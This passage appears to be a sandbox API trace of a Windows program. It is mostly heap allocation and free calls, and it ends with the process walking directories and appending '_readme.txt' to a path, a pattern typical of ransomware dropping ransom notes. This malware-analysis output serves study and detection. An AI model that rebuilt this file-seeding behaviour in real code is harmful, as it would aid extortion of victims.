HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.085] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0188.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.085] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.085] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.085] PathFindFileNameW (pszPath="") returned="" [0188.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.086] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.086] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.087] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0188.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.087] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0188.088] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | 